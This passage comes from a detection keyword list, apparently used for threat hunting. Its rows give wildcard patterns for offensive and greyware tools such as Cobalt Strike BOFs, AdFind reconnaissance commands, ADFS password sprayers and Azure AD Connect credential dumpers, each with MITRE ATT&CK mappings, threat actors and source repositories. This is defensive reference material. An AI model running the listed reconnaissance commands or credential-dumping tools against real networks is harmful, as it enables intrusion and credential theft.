- T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUser-Bof.x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*AddUserImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*AddUserToDomainGroup *Domain Admins*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,0,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*AddUserToDomainGroup.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*AddUserToDomainGroup.cna*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*adexplorer.exe*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adexplorer.go*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -*adexplorer.zip*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adexplorer64.exe*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adexplorer64a.exe*,greyware_tool_keyword,adexplorer,Active Directory Explorer (AD Explorer) is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database. It can be abused by malicious actors,T1003.001 - T1087.001,TA0006 - TA0007,N/A,N/A,AD Enumeration,https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ADExplorerSnapshot.py*,offensive_tool_keyword,ADExplorerSnapshot.py,ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/c3c/ADExplorerSnapshot.py,1,1,N/A,N/A,7,680,90,2023-08-24T11:58:03Z,2021-12-22T14:42:23Z -*ADExplorerSnapshot.py.git*,offensive_tool_keyword,ADExplorerSnapshot.py,ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/c3c/ADExplorerSnapshot.py,1,1,N/A,N/A,7,680,90,2023-08-24T11:58:03Z,2021-12-22T14:42:23Z -*adfind -f *,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind -f objectclass=trusteddomain*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind -sc trustdmp*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.bat*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f (objectcategory=person) > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f *(objectcategory=group)* > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f objectcategory=computer > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -f objectclass=trusteddomain*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -gcb -sc trustdmp > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*,offensive_tool_keyword,POC,command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*adfind.exe -sc trustdmp*,greyware_tool_keyword,adfind,query domain trusts with adfind,T1482 - T1018,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*,offensive_tool_keyword,adfind,attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files,T1548 T1134 T1078 T1078.002,TA0004,N/A,N/A,Exploitation tools,http://www.joeware.net/freetools/tools/adfind/index.htm,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*adfind.exe*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*AdFind.zip*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://www.joeware.net/freetools/tools/adfind/usage.htm,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ADFSDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ADFSpoof.py*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ADFSpoof-master*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,1,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*ADFSpray.csv*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*adfspray.git*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*ADFSpray.py*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*ADHunt-main.zip*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*adidnsdump -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*adidnsdump*,offensive_tool_keyword,adidnsdump,By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.,T1018 - T1087 - T1201 - T1056 - T1039,TA0005 - TA0009,N/A,N/A,Information Gathering,https://github.com/dirkjanm/adidnsdump,1,0,N/A,N/A,8,772,105,2023-06-20T07:49:31Z,2019-04-24T17:18:46Z -*ad-ldap-enum.py*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*ad-ldap-enum-main*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*adm|admin|root|sudo|wheel*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*admin.kirbi*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Admin2Sys.exe*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z -*Admin2Sys-main*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z -*Adminisme/ServerScan/*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*adobe_top100_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ADRecon -OutputDir *,greyware_tool_keyword,adrecon,ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.,T1018 - T1087.001 - T1069.001 - T1003.002 - T1482,TA0007 - TA0009 - TA0040,N/A,N/A,AD Enumeration,https://github.com/adrecon/ADRecon,1,0,greyware tool - risks of False positive !,N/A,5,487,83,2023-08-08T21:44:01Z,2018-12-15T13:00:09Z -*ADRecon.ps1*,greyware_tool_keyword,adrecon,ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.,T1018 - T1087.001 - T1069.001 - T1003.002 - T1482,TA0007 - TA0009 - TA0040,N/A,N/A,AD Enumeration,https://github.com/adrecon/ADRecon,1,1,greyware tool - risks of False positive !,N/A,5,487,83,2023-08-08T21:44:01Z,2018-12-15T13:00:09Z -*adsearch* --domain-admins*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,0,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*adsearch.exe*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*ADSearch.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ADSearch.sln*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*ADSearch\ADSearch.cs*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,0,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*adsearch-master.zip,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*ADSyncDecrypt.exe*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*ADSyncGather.exe*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*ADSyncQuery*ADSync.mdf*.txt*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,0,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*Advanced IP Scanner*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*advanced_ip_scanner*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - 